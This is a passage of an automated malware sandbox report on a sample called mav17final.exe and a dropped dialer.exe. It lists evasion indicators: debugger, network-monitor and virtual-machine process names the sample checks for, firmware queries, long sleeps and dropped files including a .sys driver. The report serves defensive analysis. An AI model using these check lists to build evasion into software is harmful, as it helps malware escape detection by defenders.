      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\dwm.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\dwm.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Query firmware table information (likely to detect VMs)
      Source: C:\Windows\System32\dwm.exeSystem information queried: FirmwareTableInformation
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "IDAG.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "IDAG.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "QEMU-GA.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "IMPORTREC.EXE",
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "IDAQ.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WINDBG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: IDAQ.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "WINDBG.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "WINDBG.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "X64DBG.EXE" 4
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2067450371.0000018718D1C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"03
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "WIRESHARK.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMUSRVC.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "IDAQ.EXE"`G
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDAG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: QEMU-GA.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "IMPORTREC.EXE"P5
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "X64DBG.EXE",
      Source: mav17final.exe, 00000002.00000002.2062309954.00000187173C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXESION
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IMPORTREC.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "XENSERVICE.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE"@2
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDAQ.EXE
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE",
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXEP
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D1C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "PROCESSHACKER.EXE"ESS_LIST0O
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "WIRESHARK.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "QEMU-GA.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "IDAQ.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "IDAG.EXE" H
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "IMPORTREC.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "X64DBG.EXE"
      Source: C:\Users\user\Desktop\mav17final.exeCode function: OpenSCManagerA,GetLastError,EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,CloseServiceHandle,CloseServiceHandle,2_2_00007FF8B9078620
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4376Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5421Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8013Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1553Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8016
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1633
      Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 613
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dllJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dllJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pydJump to dropped file
      Source: C:\ProgramData\dialer.exeDropped PE file which has not been started: C:\Windows\Temp\ujjtjyeszdwn.sysJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\select.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dllJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pydJump to dropped file
      Source: C:\Users\user\Desktop\mav17final.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-15173
      Source: C:\Users\user\Desktop\mav17final.exeAPI coverage: 1.9 %
      Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824Thread sleep count: 4376 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824Thread sleep count: 5421 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676Thread sleep time: -4611686018427385s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 8013 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 1553 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -4611686018427385s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520Thread sleep count: 8016 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep count: 1633 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\System32\dwm.exe TID: 7092Thread sleep count: 613 > 30
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA487C0 FindFirstFileExW,FindClose,0_2_00007FF79EA487C0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5D354 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,0_2_00007FF79EA5D354
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9075AC0 SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,GetVolumeInformationA,SetLastError,FindFirstVolumeMountPointA,FindNextVolumeMountPointA,FindVolumeMountPointClose,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,2_2_00007FF8B9075AC0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9074610 RtlGetVersion,GetSystemInfo,InitializeCriticalSection,2_2_00007FF8B9074610
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vboxtray.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exep
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe0
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe",
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmwaretray.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe",
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe
      Source: mav17final.exe, 00000002.00000003.2041722275.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2053285690.0000018717615000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2056333676.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2062883775.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2054935651.0000018717628000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2033297099.0000018717654000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2058925754.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2058925754.0000018717629000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2051313400.0000018717657000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2058801834.0000018717629000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray.exe0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc.exep
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe"
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe"
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe",
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe",
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"
